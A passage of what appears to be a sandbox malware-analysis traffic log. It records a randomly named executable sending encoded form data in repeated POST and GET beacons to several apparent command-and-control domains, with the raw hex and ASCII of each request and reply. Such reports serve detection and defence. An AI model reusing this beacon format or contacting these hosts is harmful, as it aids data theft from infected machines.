Jan 7, 2025 12:23:55.411984921 CET	10930	OUT	POST /nmrk/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.marketyemen.holdings Content-Length: 10305 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.marketyemen.holdings Referer: http://www.marketyemen.holdings/nmrk/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 79 32 45 52 62 45 69 70 31 6a 42 56 69 39 37 4b 75 32 64 55 70 46 77 34 52 56 62 4b 36 63 56 65 76 44 35 65 5a 78 52 63 63 46 53 67 78 61 54 38 72 5a 42 69 4b 53 54 72 6f 78 34 4a 49 6e 41 4c 34 4c 2f 4a 33 4f 55 47 44 50 54 49 56 62 46 63 4b 6d 6c 47 61 4c 72 34 6e 43 4f 30 4b 35 69 36 2b 4e 6c 43 4f 30 64 6d 65 67 74 4d 2f 64 58 2b 49 58 79 6a 6a 41 52 58 74 6c 61 4c 74 44 58 70 35 54 4b 50 42 63 4a 57 31 6d 74 71 48 55 30 64 46 58 42 36 78 68 73 79 50 52 2f 6e 58 70 67 53 32 41 73 74 31 42 35 76 54 43 69 71 4f 5a 79 49 47 68 6d 41 69 59 41 62 46 30 44 73 52 4a 34 51 36 78 4c 69 66 78 4a 6b 37 54 2f 42 7a 75 47 37 6e 75 58 64 43 68 2b 57 53 42 53 43 7a 42 4d 6d 4f 63 77 57 79 67 59 45 73 76 75 4a 47 68 59 56 43 2b 39 76 6c 71 75 42 4e 32 34 32 6e 37 70 76 4d 69 37 74 32 48 43 49 78 78 5a 72 30 51 4a 67 44 4d 73 44 4f 57 4c 49 64 78 69 77 77 5a 67 42 6b 68 31 59 7a 4e 61 75 45 36 35 63 74 6f 61 5a 4c 79 70 63 55 2f 7a 47 71 39 62 6a 33 35 36 76 66 4b 52 64 57 65 79 35 58 [TRUNCATED] Data Ascii: Jz1hrtoh=y2ERbEip1jBVi97Ku2dUpFw4RVbK6cVevD5eZxRccFSgxaT8rZBiKSTrox4JInAL4L/J3OUGDPTIVbFcKmlGaLr4nCO0K5i6+NlCO0dmegtM/dX+IXyjjARXtlaLtDXp5TKPBcJW1mtqHU0dFXB6xhsyPR/nXpgS2Ast1B5vTCiqOZyIGhmAiYAbF0DsRJ4Q6xLifxJk7T/BzuG7nuXdCh+WSBSCzBMmOcwWygYEsvuJGhYVC+9vlquBN242n7pvMi7t2HCIxxZr0QJgDMsDOWLIdxiwwZgBkh1YzNauE65ctoaZLypcU/zGq9bj356vfKRdWey5XGHmr06WZcoMfkITgHgVWfp/BI1RylBv3S4wp1uJbexutDhiTKsI9kdiTkk+bWAOQbJNcIUtchgk+tEb77AKDB3FQGnVJ/oufWHdRlB+IWrTVZS6M/mJNUbO0S/5xD66sOVD2YaecJlObjChqMLVcDjv3tS+8rO4/PNv6reIw6VH1/S/eP7xEzwqbjff4ZlwU5Unmx+yt4KvQk0VyUA+3sN5f4960Lmuo3wdbzuSiXEMPrbRKH13D/fxEk99u61448pLSrVR2aa6rgdngyj3+GuE1QBEKwqX/mB6YUBB/6XohQOomIWRbtl67vtfMvEhmMhs1NX+TwV9pf/+rURY+w7B/XyBQYeM8dYma7b6d9bBQn8S8FajouzCUoKsyKZn+TXBAhas3TWiMeqm2nZkJuTAwYTpbAES0U976FoQBV8m9kFyDDbe+y+JuajEnoX24sm9Bjh1qdYMdu+nzmMgLSH79aC4kbBSkt4N81/cSx2FuM5AIq/W5y/JExHlqFFVWfF5zNiZuEoBSGH/0+JAQ19MAGiw5u0ujB09JBsrjt6DIKh3SJzxDvETL2B60oAa6UOUnnEOWZE8PzuI254ozsr5WQUX47cgaYpnuI4PKqCvuMzdak7QC3frR5bpwbhY7WKw1RhcdCgHceqxKCnPNwiYK8yPvncc21h [TRUNCATED]
Jan 7, 2025 12:23:55.881503105 CET	1236	IN	HTTP/1.1 200 OK date: Tue, 07 Jan 2025 11:23:54 GMT content-type: text/html; charset=utf-8 content-length: 1146 x-request-id: a613311c-a3aa-490e-be75-46a07a61e449 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_0Gcqj+bYUmkpb6BxAFHsiKw1lwJpHsaqT8kD4JG33/RTQgbzxm2fvgCUrIfher/p+uk/6E8/Ri+ACmyxSKP1hQ== set-cookie: parking_session=a613311c-a3aa-490e-be75-46a07a61e449; expires=Tue, 07 Jan 2025 11:38:55 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 30 47 63 71 6a 2b 62 59 55 6d 6b 70 62 36 42 78 41 46 48 73 69 4b 77 31 6c 77 4a 70 48 73 61 71 54 38 6b 44 34 4a 47 33 33 2f 52 54 51 67 62 7a 78 6d 32 66 76 67 43 55 72 49 66 68 65 72 2f 70 2b 75 6b 2f 36 45 38 2f 52 69 2b 41 43 6d 79 78 53 4b 50 31 68 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_0Gcqj+bYUmkpb6BxAFHsiKw1lwJpHsaqT8kD4JG33/RTQgbzxm2fvgCUrIfher/p+uk/6E8/Ri+ACmyxSKP1hQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 7, 2025 12:23:55.881531954 CET	599	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTYxMzMxMWMtYTNhYS00OTBlLWJlNzUtNDZhMDdhNjFlNDQ5IiwicGFnZV90aW1lIjoxNzM2MjQ5MD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	50010	199.59.243.228	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:23:57.953114033 CET	550	OUT	GET /nmrk/?Jz1hrtoh=/0sxYx23xH8xi+Hy4RBlkRoqDT/P5tB28j8aWDRWCja+tef/r7M3KSHAsxEmH2Ql1ZDI27EdC/CcGrRNLTkBRaCB5yjhP6SE0vp9NThEHXhAy/LVFRuQiB4=&UdJ=uBcLexhXPjVX9H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Host: www.marketyemen.holdings Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Jan 7, 2025 12:23:58.398647070 CET	1236	IN	HTTP/1.1 200 OK date: Tue, 07 Jan 2025 11:23:57 GMT content-type: text/html; charset=utf-8 content-length: 1506 x-request-id: 9ec557f0-5ab3-45b3-bd81-a5bd4e5bab34 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_osyVP0GuwQiYeXzzRO2WJ4jO7NaozYnArbmfr7Oggw1vauz8RhMEhR8h4YsP2tyfaM5Mx8o0fmiknpZUNU6mmw== set-cookie: parking_session=9ec557f0-5ab3-45b3-bd81-a5bd4e5bab34; expires=Tue, 07 Jan 2025 11:38:58 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 73 79 56 50 30 47 75 77 51 69 59 65 58 7a 7a 52 4f 32 57 4a 34 6a 4f 37 4e 61 6f 7a 59 6e 41 72 62 6d 66 72 37 4f 67 67 77 31 76 61 75 7a 38 52 68 4d 45 68 52 38 68 34 59 73 50 32 74 79 66 61 4d 35 4d 78 38 6f 30 66 6d 69 6b 6e 70 5a 55 4e 55 36 6d 6d 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_osyVP0GuwQiYeXzzRO2WJ4jO7NaozYnArbmfr7Oggw1vauz8RhMEhR8h4YsP2tyfaM5Mx8o0fmiknpZUNU6mmw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 7, 2025 12:23:58.398664951 CET	959	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWVjNTU3ZjAtNWFiMy00NWIzLWJkODEtYTViZDRlNWJhYjM0IiwicGFnZV90aW1lIjoxNzM2MjQ5MD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	50011	162.251.95.62	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:04.302551031 CET	798	OUT	POST /9aud/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.y6h6kn.top Content-Length: 205 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.y6h6kn.top Referer: http://www.y6h6kn.top/9aud/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 6d 31 4e 37 55 4c 39 79 39 39 4a 54 4c 53 55 47 46 39 6b 51 4a 41 32 49 46 77 53 75 53 6e 69 6e 5a 70 58 59 45 4f 54 4b 6c 34 33 4c 4d 2b 61 62 34 2b 59 41 48 37 47 32 48 42 35 73 4c 61 51 64 69 30 7a 71 6b 72 63 4d 78 6a 4d 4e 70 2b 52 4f 51 31 71 68 49 6b 6c 2b 42 42 42 58 6a 49 78 54 4a 76 6e 53 6a 43 43 63 6a 61 47 49 50 32 79 2b 7a 32 63 6f 54 63 34 5a 5a 5a 66 63 36 68 51 4a 52 6a 56 76 73 2b 6f 48 5a 58 2b 36 5a 39 31 65 6c 72 58 78 39 76 6f 57 42 59 70 46 70 64 6e 64 52 2f 38 36 52 44 59 4b 36 2f 44 2f 63 54 4b 4f 36 73 41 77 76 67 58 73 57 48 4c 48 70 6b 44 43 49 67 3d 3d Data Ascii: Jz1hrtoh=m1N7UL9y99JTLSUGF9kQJA2IFwSuSninZpXYEOTKl43LM+ab4+YAH7G2HB5sLaQdi0zqkrcMxjMNp+ROQ1qhIkl+BBBXjIxTJvnSjCCcjaGIP2y+z2coTc4ZZZfc6hQJRjVvs+oHZX+6Z91elrXx9voWBYpFpdndR/86RDYK6/D/cTKO6sAwvgXsWHLHpkDCIg==
Jan 7, 2025 12:24:05.163647890 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 07 Jan 2025 11:24:05 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "674427dd-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	50012	162.251.95.62	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:06.846410036 CET	818	OUT	POST /9aud/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.y6h6kn.top Content-Length: 225 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.y6h6kn.top Referer: http://www.y6h6kn.top/9aud/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 6d 31 4e 37 55 4c 39 79 39 39 4a 54 4c 78 63 47 65 66 4d 51 4f 67 32 48 4f 51 53 75 48 58 69 6a 5a 70 4c 59 45 50 47 56 6b 4e 48 4c 4d 63 79 62 35 36 73 41 45 37 47 32 55 42 35 74 50 61 51 57 69 30 76 63 6b 72 67 4d 78 69 6f 4e 70 36 42 4f 58 43 47 69 49 30 6c 38 4a 68 42 56 73 6f 78 54 4a 76 6e 53 6a 45 76 35 6a 61 2b 49 50 69 4f 2b 38 33 63 76 4e 4d 34 59 4f 70 66 63 2b 68 51 7a 52 6a 56 4a 73 2f 31 53 5a 52 79 36 5a 2f 64 65 69 36 58 79 33 76 6f 63 66 6f 6f 55 6b 59 2b 70 55 4e 6c 61 65 79 42 71 39 64 66 63 51 31 48 55 72 64 68 6e 39 67 7a 66 4c 41 43 7a 6b 6e 2b 4c 54 6b 4a 64 2f 57 69 37 37 68 33 34 5a 51 47 58 55 6c 72 2b 38 2f 30 3d Data Ascii: Jz1hrtoh=m1N7UL9y99JTLxcGefMQOg2HOQSuHXijZpLYEPGVkNHLMcyb56sAE7G2UB5tPaQWi0vckrgMxioNp6BOXCGiI0l8JhBVsoxTJvnSjEv5ja+IPiO+83cvNM4YOpfc+hQzRjVJs/1SZRy6Z/dei6Xy3vocfooUkY+pUNlaeyBq9dfcQ1HUrdhn9gzfLACzkn+LTkJd/Wi77h34ZQGXUlr+8/0=
Jan 7, 2025 12:24:07.878530979 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 07 Jan 2025 11:24:07 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "674427dd-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	50013	162.251.95.62	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:09.398406029 CET	10900	OUT	POST /9aud/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.y6h6kn.top Content-Length: 10305 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.y6h6kn.top Referer: http://www.y6h6kn.top/9aud/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 6d 31 4e 37 55 4c 39 79 39 39 4a 54 4c 78 63 47 65 66 4d 51 4f 67 32 48 4f 51 53 75 48 58 69 6a 5a 70 4c 59 45 50 47 56 6b 4d 54 4c 50 74 53 62 34 64 77 41 46 37 47 32 58 42 35 6f 50 61 51 78 69 30 6e 41 6b 72 73 6d 78 67 67 4e 6f 59 4a 4f 53 33 79 69 44 30 6c 38 57 52 42 59 6a 49 77 4c 4a 76 33 57 6a 43 50 35 6a 61 2b 49 50 6b 71 2b 37 6d 63 76 50 4d 34 5a 5a 5a 66 49 36 68 52 63 52 69 38 38 73 2f 78 43 59 68 53 36 5a 66 74 65 6b 4a 2f 79 2f 76 6f 53 65 6f 6f 4d 6b 59 36 32 55 4e 35 6f 65 79 6b 39 39 66 44 63 42 79 32 4c 32 50 74 6d 2b 6a 66 74 5a 6a 69 70 39 46 50 4c 54 56 35 6e 33 48 50 37 2b 67 62 49 43 58 58 2f 45 6e 54 47 72 2f 52 79 75 4c 68 6e 42 63 35 65 6a 48 51 57 67 59 53 79 2f 4e 45 6f 4b 67 45 6d 76 33 46 76 74 4b 5a 58 46 77 4c 73 50 69 71 6e 6f 57 37 4c 54 55 49 33 64 65 71 6c 36 6e 49 50 46 68 5a 7a 6b 4c 73 79 77 77 32 66 36 44 4f 69 75 72 67 72 42 45 4a 38 38 76 61 37 52 45 4d 33 68 6e 44 58 75 65 53 57 49 79 67 79 4a 49 71 31 79 53 6c 52 58 64 38 55 37 [TRUNCATED] Data Ascii: Jz1hrtoh=m1N7UL9y99JTLxcGefMQOg2HOQSuHXijZpLYEPGVkMTLPtSb4dwAF7G2XB5oPaQxi0nAkrsmxggNoYJOS3yiD0l8WRBYjIwLJv3WjCP5ja+IPkq+7mcvPM4ZZZfI6hRcRi88s/xCYhS6ZftekJ/y/voSeooMkY62UN5oeyk99fDcBy2L2Ptm+jftZjip9FPLTV5n3HP7+gbICXX/EnTGr/RyuLhnBc5ejHQWgYSy/NEoKgEmv3FvtKZXFwLsPiqnoW7LTUI3deql6nIPFhZzkLsyww2f6DOiurgrBEJ88va7REM3hnDXueSWIygyJIq1ySlRXd8U7p06qd65fe6bRhTtYi9qryhTz2btYe4z2ukrhyCNbYVCm2aNkVAnS64LbosC6pluyBDQl8Q82hkeuHfrkeWUfHuzaw+Z2Vl1Mqh5gZajeLuCUe9q+NgmNP8WnEnrB41joTCdQq6txWd5K0kUqErfKQoKKHW7A4DPLl4qAo/T1WfzBcATTThKBCqS7WF6i5lqKesMqSZJ7Lv8ddrXhjjfyHF05PKEY7pFuZTMb7/KVZyE3zOW/ekAOfVSLBPNkfGZqHOH5l4moMuPdwXtgAp5VbfDVnpLJGzpN57CVwusI2i+7BzXDdnKYjeE7GHoPbVOKDdKKE76Kb8ns4zB/rfdSX8+/g1SdhEEi+Xnm2urgGMMsXgogprmENqGFC92ERDJs9mGOW/F4wsRwgdprI3aj6YLv3GFL64qtOKlH/NJtDjrGl3TfHqLaTBwhDDn7mMFuE4VC3oVAQMheFMrnaxAZwiMTvfNWGA+QyA2usflpK031sc+/zTKZwWqR2NlMrIvjR+m/Ahm4KVV8EKEGfVg+ALXN5tnU0R23PWeX5uOmgNX58lNdrW4VuLW7Db/wOVJNxu7GMqWiw2sgWcTZ4BTlQxo4kh9rJ6Ak9j+u1xAhq28cELVMnfmMJNi5naeH5PSCkTsJkFl+XcRLuGy1+bljPyQ6j+HuEj2+Qv [TRUNCATED]
Jan 7, 2025 12:24:10.265273094 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 07 Jan 2025 11:24:10 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "674427dd-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50014	162.251.95.62	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:11.936641932 CET	540	OUT	GET /9aud/?Jz1hrtoh=r3lbX71h7q0AHy0oTe4pOi2BWk3NJWKXCKCSBMbv4rPFPtn+x9pbH5vfUhpnGKcWhU2ilqg7+CZg+6VCYnHULVR8JiBaz41iVPfXoiOh7626TGmYyz4nYPg=&UdJ=uBcLexhXPjVX9H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Host: www.y6h6kn.top Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Jan 7, 2025 12:24:12.813553095 CET	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 07 Jan 2025 11:24:12 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "674427dd-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	50015	134.122.135.48	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:18.523962975 CET	828	OUT	POST /4uqm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.x3kwqc5tye4vl90y.top Content-Length: 205 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.x3kwqc5tye4vl90y.top Referer: http://www.x3kwqc5tye4vl90y.top/4uqm/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 2f 76 59 78 51 71 38 64 66 39 31 58 44 2f 4f 4c 38 73 74 58 54 41 78 45 43 41 4d 64 38 4b 65 33 51 44 4e 6a 5a 6f 55 54 33 6d 64 76 63 30 34 73 6a 53 67 4f 6e 70 65 59 6b 76 61 44 7a 55 49 4d 79 58 6a 34 30 46 69 45 61 48 51 61 34 75 7a 6a 43 69 4c 78 53 70 66 61 57 31 36 73 45 46 68 68 5a 34 30 66 69 35 4b 46 66 4b 44 61 39 56 6c 6e 55 